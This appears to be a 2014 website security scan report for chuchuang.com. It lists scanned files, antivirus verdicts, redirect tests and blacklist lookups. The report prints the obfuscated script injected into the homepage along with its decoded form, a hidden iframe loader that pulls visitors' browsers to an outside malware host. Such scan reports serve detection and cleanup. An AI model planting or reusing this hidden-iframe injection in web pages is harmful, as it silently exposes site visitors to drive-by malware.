Scanned pages/files
Request | Server response | Status |
http://chuchuang.com/ | 200 OK Content-Length: 3751 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
if(window.document)a=("urf3".split+'qwe').substr(0,6);aa=(Date+{}).substr(0,6);if(a===aa)f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,4,86,-28,-28,-28,68,65,77,60,72,64,77,3,4,22,-28,-28,88,-5,64,71,78,64,-5,86,-28,-28,-28,63,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-3,23,68,65,77,60,72,64,-5,78,77,62,24,2,67,79,79,75,21,10,10,61,61,70,67,70,75,84,80,9,85,84,73,78,9,62,74,72,10,68,10,68,9,75,67,75,26,66,74
Decoded script:
e(s) e(s)
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://bbkhkpyu.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://bbkhkpyu.zyns.com/i/i.php?go=1');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttrib
<iframe src='http://bbkhkpyu.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Antivirus reports:
http://chuchuang.com/swfobject.js | 200 OK Content-Length: 6880 Content-Type: application/x-javascript | clean |
http://law.sudusite.net/leshan110/jquery.js | 200 OK Content-Length: 91556 Content-Type: application/x-javascript | clean |
http://law.sudusite.net/leshan110/leshan110.js | 200 OK Content-Length: 667 Content-Type: application/x-javascript | clean |
http://chuchuang.com/swfobject.html?detectflash=false | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://chuchuang.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chuchuang.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Mar 2014 22:33:10 GMT
Accept-Ranges: bytes
ETag: "801bfd9f47b6cc1:15c774"
Server: Microsoft-IIS/6.0
Content-Length: 3751
Content-Location: http://chuchuang.com/index.html
Content-Type: text/html
Last-Modified: Fri, 09 Dec 2011 07:53:23 GMT
X-Powered-By: ASP.NET
...3751 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chuchuang.com
Referer: http://www.google.com/search?q=chuchuang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chuchuang.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chuchuang.com/
Result: chuchuang.com is not infected or malware details are not published yet.